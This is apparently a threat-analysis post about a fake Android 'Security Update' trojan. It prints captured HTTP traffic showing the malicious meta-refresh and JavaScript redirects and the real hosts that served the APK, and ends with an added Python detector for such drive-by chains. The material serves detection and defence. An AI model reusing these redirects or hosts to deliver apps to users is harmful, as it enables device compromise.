RARE Android Linux OS Smart Phone Malware Fake Security Update : Security.Update.apk PCAP Traffic Download

January 29, 2016

Download fake security update Security.Update.apk Malware PCAP : android

 

Since it poses as a security update for Android, it’s highly likely that someone may fall for this trick and choose to install the malware. VIPRE Mobile detects this new variant as Trojan.AndroidOS.NoCom.a.

This particular Android Trojan doesn't reveal itself with bells and whistles upon installation. Apart from its ability to run in the background, it doesn't use a discernible icon, and it consumes very little processing power and battery life. So how does this app work exactly? Whenever the infected Android device connects to the Internet, the malicious app phones home to its command and control (C&C) server, after which it turns the device into a TCP relay.

 

2014-03-05 22:00:12.536109 IP 192.168.1.110.43818 > 142.11.194.109.80: Flags [P.], seq 1:389, ack 1, win 229, options [nop,nop,TS val 778152 ecr 135020245], length 388: HTTP: GET /tmwib/fox_news.php HTTP/1.1
GET /tmwib/fox_news.php HTTP/1.1
Host: billions2buy.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
2014-03-05 22:00:12.561697 IP 142.11.194.109.80 > 192.168.1.110.43818: Flags [.], ack 389, win 122, options [nop,nop,TS val 135020423 ecr 778152], length 0
2014-03-05 22:00:12.612751 IP 142.11.194.109.80 > 192.168.1.110.43818: Flags [P.], seq 1:469, ack 389, win 122, options [nop,nop,TS val 135020475 ecr 778152], length 468: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 06 Mar 2014 03:00:12 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_qos/9.74 mod_auth_passthrough/2.1 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

68
<meta http-equiv="refresh" content="2; url=http://mobile.downloadmobilesoftware.ru/FLVupdate.php ">

2014-03-05 22:00:15.097659 IP 192.168.1.110.44914 > 109.236.85.243.80: Flags [P.], seq 1:453, ack 1, win 229, options [nop,nop,TS val 778409 ecr 593653813], length 452: HTTP: GET /FLVupdate.php HTTP/1.1
GET /FLVupdate.php HTTP/1.1
Host: mobile.downloadmobilesoftware.ru
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Referer: http://billions2buy.com/tmwib/fox_news.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
2014-03-05 22:00:15.243268 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [.], ack 453, win 108, options [nop,nop,TS val 593653863 ecr 778409], length 0
2014-03-05 22:00:15.251693 IP 109.236.85.243.80 > 192.168.1.110.44915: Flags [S.], seq 443806906, ack 703730089, win 5792, options [mss 1460,sackOK,TS val 593653863 ecr 778408,nop,wscale 6], length 0
2014-03-05 22:00:15.252024 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [P.], seq 1:347, ack 453, win 108, options [nop,nop,TS val 593653865 ecr 778409], length 346: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 06 Mar 2014 03:55:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.25

9b
<html><head><script type="text/javascript">window.top.location=document.URL.replace("FLVupdate.php","FLVupdate2.php");</script></head><body></body></html>

0

2014-03-05 22:00:15.529240 IP 192.168.1.110.44914 > 109.236.85.243.80: Flags [P.], seq 453:917, ack 347, win 245, options [nop,nop,TS val 778451 ecr 593653865], length 464: HTTP: GET /FLVupdate2.php HTTP/1.1
GET /FLVupdate2.php HTTP/1.1
Host: mobile.downloadmobilesoftware.ru
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Referer: http://mobile.downloadmobilesoftware.ru/FLVupdate.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
2014-03-05 22:00:15.680768 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [.], seq 347:1795, ack 917, win 124, options [nop,nop,TS val 593653973 ecr 778451], length 1448: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 06 Mar 2014 03:55:25 GMT
Content-Type: application/vnd.android.package-archive
Content-Length: 64600
Connection: keep-alive
X-Powered-By: PHP/5.3.25
Content-Disposition: attachment; filename="Security.Update.apk"

2014-03-05 22:00:15.680966 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [.], seq 1795:3243, ack 917, win 124, options [nop,nop,TS val 593653973 ecr 778451], length 1448: HTTP

2014-03-05 22:00:25.294090 IP 192.168.1.110.34858 > 109.236.85.243.80: Flags [P.], seq 1:349, ack 1, win 229, options [nop,nop,TS val 779428 ecr 593656320], length 348: HTTP: GET /FLVupdate2.php HTTP/1.1
GET /FLVupdate2.php HTTP/1.1
Referer: http://mobile.downloadmobilesoftware.ru/FLVupdate.php
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Cookie:
Accept-Encoding: identity
Host: mobile.downloadmobilesoftware.ru
Connection: Keep-Alive
2014-03-05 22:00:25.433270 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [.], ack 349, win 108, options [nop,nop,TS val 593656410 ecr 779428], length 0
2014-03-05 22:00:25.442352 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [.], seq 1:1449, ack 349, win 108, options [nop,nop,TS val 593656413 ecr 779428], length 1448: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 06 Mar 2014 03:55:35 GMT
Content-Type: application/vnd.android.package-archive
Content-Length: 64600
Connection: keep-alive
X-Powered-By: PHP/5.3.25
Content-Disposition: attachment; filename="Security.Update.apk"

2014-03-05 22:00:25.442615 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [.], seq 1449:2897, ack 349, win 108, options [nop,nop,TS val 593656413 ecr 779428], length 1448: HTTP

2014-03-05 22:00:26.274306 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [P.], seq 63470:64871, ack 349, win 108, options [nop,nop,TS val 593656619 ecr 779512], length 1401: HTTP
2014-03-05 22:00:26.347896 IP 192.168.1.110.34858 > 109.236.85.243.80: Flags [.], ack 51886, win 1858, options [nop,nop,TS val 779534 ecr 593656618], length 0
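The infection chain in the capture above is visible from the HTTP layer alone: a meta refresh on billions2buy.com, a JavaScript rewrite of the URL from FLVupdate.php to FLVupdate2.php, and finally an APK served as a Content-Disposition attachment from a host the user never typed. The Python below is an added example (not part of the original post or the VIPRE write-up) that reconstructs that chain from sample transactions transcribed from the headers above and flags the cross-host redirect-to-APK pattern; `next_hop`, `redirect_chain` and `is_driveby_apk` are names chosen here.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed sample: the three HTTP transactions transcribed from the capture above
# (the binary APK body is left empty).
SAMPLE = [
    {"url": "http://billions2buy.com/tmwib/fox_news.php", "content_type": "text/html",
     "disposition": "", "body": '<meta http-equiv="refresh" content="2; url='
     'http://mobile.downloadmobilesoftware.ru/FLVupdate.php ">'},
    {"url": "http://mobile.downloadmobilesoftware.ru/FLVupdate.php", "content_type": "text/html",
     "disposition": "", "body": '<script type="text/javascript">window.top.location='
     'document.URL.replace("FLVupdate.php","FLVupdate2.php");</script>'},
    {"url": "http://mobile.downloadmobilesoftware.ru/FLVupdate2.php",
     "content_type": "application/vnd.android.package-archive",
     "disposition": 'attachment; filename="Security.Update.apk"', "body": ""},
]
APK_MIME = "application/vnd.android.package-archive"
META_REFRESH = re.compile(r'http-equiv="refresh"\s+content="\d+;\s*url=([^"]+)"', re.I)
JS_URL_REPLACE = re.compile(r'document\.URL\.replace\("([^"]+)",\s*"([^"]+)"\)')

def next_hop(url, body):
    """URL a browser would load next after rendering body at url, or None."""
    m = META_REFRESH.search(body or "")
    if m:
        return urljoin(url, m.group(1).strip())  # trailing space inside the quotes is tolerated
    m = JS_URL_REPLACE.search(body or "")
    if m:
        return url.replace(m.group(1), m.group(2), 1)  # JS String.replace rewrites the first match only
    return None

def redirect_chain(transactions):
    """Follow meta-refresh / JS redirects from the first request; stop at a dead end or a loop."""
    by_url = {t["url"]: t for t in transactions}
    chain = [transactions[0]["url"]]
    while len(chain) < 16:
        t = by_url.get(chain[-1])
        nxt = next_hop(chain[-1], t["body"]) if t else None
        if nxt is None or nxt in chain:
            break
        chain.append(nxt)
    return chain

def is_driveby_apk(transactions):
    """True when a redirect chain that crosses hosts ends in an APK pushed as an attachment."""
    chain = redirect_chain(transactions)
    final = {t["url"]: t for t in transactions}.get(chain[-1])
    hosts = {urlsplit(u).hostname for u in chain}
    served_apk = (final is not None and final["content_type"] == APK_MIME
                  and final["disposition"].lower().startswith("attachment"))
    return served_apk and len(chain) > 1 and len(hosts) > 1
```

On the sample the chain resolves to the three URLs in the capture and the verdict is True; a single direct APK download with no redirect is not flagged.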

 
